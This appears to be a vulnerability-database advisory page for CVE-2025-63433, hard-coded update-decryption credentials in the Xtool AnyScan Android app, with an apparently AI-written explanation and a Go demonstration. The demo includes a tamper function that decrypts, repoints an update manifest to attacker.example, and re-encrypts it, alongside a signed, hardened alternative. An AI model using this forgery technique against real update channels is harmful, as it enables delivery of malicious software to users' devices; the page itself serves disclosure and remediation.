CVE-2025-63433
BaseFortify
Publication date: 2025-11-24
Last updated on: 2025-11-28
Assigner: MITRE
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| xtooltech | xtool_anyscan | up to and including 4.40.40 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-798 | The product contains hard-coded credentials, such as a password or cryptographic key. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability affects the Xtooltech Xtool AnyScan Android application, version 4.40.40 and earlier. The app decrypts the update metadata it downloads using a cryptographic key and initialization vector (IV) that are hard-coded in its code (CWE-798). Anyone who unpacks the APK can recover both values, and because every installation shares the same key, a manifest that decrypts correctly proves nothing about where it came from. An attacker positioned on the network path between the app and its update server can therefore decrypt the update manifest, modify it (for example, to point the download at a package they control), re-encrypt it with the same key and IV, and the app will accept it as genuine and proceed to download and install the malicious update package. Encrypting data with a key the client already holds provides at most confidentiality, not integrity or authenticity; the standard remediation is to sign the update metadata with a key whose private half never ships in the app.
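The following is an added example, not code from the advisory or from Xtool's application. It is written in Go rather than the app's own Android language because Go's standard library carries both AES and Ed25519, so it runs without dependencies. It models the flaw described above end to end: a manifest encrypted with a static key and IV (assumed here to be AES-256-CBC with PKCS#7 padding; the advisory names no cipher), an app-side check that trusts anything that decrypts, an on-path attacker who decrypts, edits and re-encrypts, and then the hardened alternative where the manifest is signed and the app holds only the public key. The key, IV, seed, manifest fields and URLs are all constructed demo values.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/ed25519"
	"encoding/json"
	"errors"
	"fmt"
)

// Constructed demo values, NOT the real AnyScan key/IV (the advisory does not publish them).
// They stand in for constants compiled into the APK, readable by anyone who unpacks the app.
// AES-256-CBC with PKCS#7 padding is an assumption; the advisory names no cipher or mode.
var hardcodedKey = []byte("0123456789abcdef0123456789abcdef") // 32 bytes, static
var hardcodedIV = []byte("fedcba9876543210")                  // 16 bytes, static

// Manifest is a constructed stand-in for the update metadata the app downloads.
type Manifest struct {
	URL    string `json:"url"`
	SHA256 string `json:"sha256"`
}

// encryptManifest is the vendor server side; with the same key and IV, it is also the attacker's re-encrypt step.
func encryptManifest(m Manifest) []byte {
	pt, _ := json.Marshal(m)                // a struct of two strings always marshals
	block, _ := aes.NewCipher(hardcodedKey) // key length is fixed above; cannot fail
	pad := aes.BlockSize - len(pt)%aes.BlockSize
	pt = append(pt, bytes.Repeat([]byte{byte(pad)}, pad)...) // PKCS#7
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(block, hardcodedIV).CryptBlocks(ct, pt)
	return ct
}

// vulnerableAccept is the app-side logic the advisory describes: whatever decrypts and parses is trusted.
func vulnerableAccept(ct []byte) (Manifest, error) {
	var m Manifest
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return m, errors.New("bad ciphertext length")
	}
	block, _ := aes.NewCipher(hardcodedKey)
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, hardcodedIV).CryptBlocks(pt, ct)
	n := int(pt[len(pt)-1]) // strip PKCS#7 padding, rejecting malformed pad bytes
	if n == 0 || n > aes.BlockSize || !bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return m, errors.New("bad padding")
	}
	return m, json.Unmarshal(pt[:len(pt)-n], &m)
}

// tamper is the on-path attacker: decrypt with the extracted key, repoint the download and its hash, re-encrypt.
func tamper(ct []byte, evil Manifest) ([]byte, error) {
	m, err := vulnerableAccept(ct)
	if err != nil {
		return nil, err
	}
	m.URL, m.SHA256 = evil.URL, evil.SHA256 // the hash sits inside the same blob, so it protects nothing
	return encryptManifest(m), nil
}

// Hardened design: the server signs the manifest with an Ed25519 private key that never ships in
// the app; the app embeds only the public key. Wire format: JSON payload || 64-byte signature.
// The seed is a constructed demo value; a real signing key belongs in an HSM or CI secret store.
var vendorPriv = ed25519.NewKeyFromSeed([]byte("demo-seed-not-a-real-vendor-key!"))
var vendorPub = vendorPriv.Public().(ed25519.PublicKey)

func signManifest(m Manifest) []byte {
	pt, _ := json.Marshal(m)
	return append(pt, ed25519.Sign(vendorPriv, pt)...)
}

// verifyManifest is the hardened app side: check the signature before parsing anything.
func verifyManifest(blob []byte) (Manifest, error) {
	var m Manifest
	if len(blob) < ed25519.SignatureSize {
		return m, errors.New("truncated manifest")
	}
	pt, sig := blob[:len(blob)-ed25519.SignatureSize], blob[len(blob)-ed25519.SignatureSize:]
	if !ed25519.Verify(vendorPub, pt, sig) {
		return m, errors.New("manifest signature invalid: refusing update")
	}
	return m, json.Unmarshal(pt, &m)
}

// swapPayload is the same attacker against the signed format: new payload, old signature.
func swapPayload(blob []byte, evil Manifest) []byte {
	pt, _ := json.Marshal(evil)
	return append(pt, blob[len(blob)-ed25519.SignatureSize:]...)
}

func main() {
	genuine := Manifest{URL: "https://updates.example/anyscan.apk", SHA256: "aa11"}
	evil := Manifest{URL: "https://attacker.example/evil.apk", SHA256: "bb22"}
	forged, _ := tamper(encryptManifest(genuine), evil)
	got, err := vulnerableAccept(forged)
	fmt.Printf("vulnerable app: err=%v, will fetch %s\n", err, got.URL)
	_, err = verifyManifest(swapPayload(signManifest(genuine), evil))
	fmt.Printf("hardened app: err=%v\n", err)
}
```

Note that the forged manifest passes every check the vulnerable client performs, including padding and JSON parsing, because the attacker produced it with the same key and IV the client uses. The signed variant fails closed: the attacker can replace the payload but cannot produce a signature for it, and the app refuses before it ever parses the metadata. Adding a hash of the package to the manifest does not help on its own, since the hash travels inside the blob the attacker controls.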
How can this vulnerability impact me?
If exploited, an attacker who can intercept and alter the app's update traffic can deliver a malicious update to the application by rewriting the update metadata it trusts. This could lead to the installation of malicious software on the device, compromising the device's security, data integrity, and user privacy.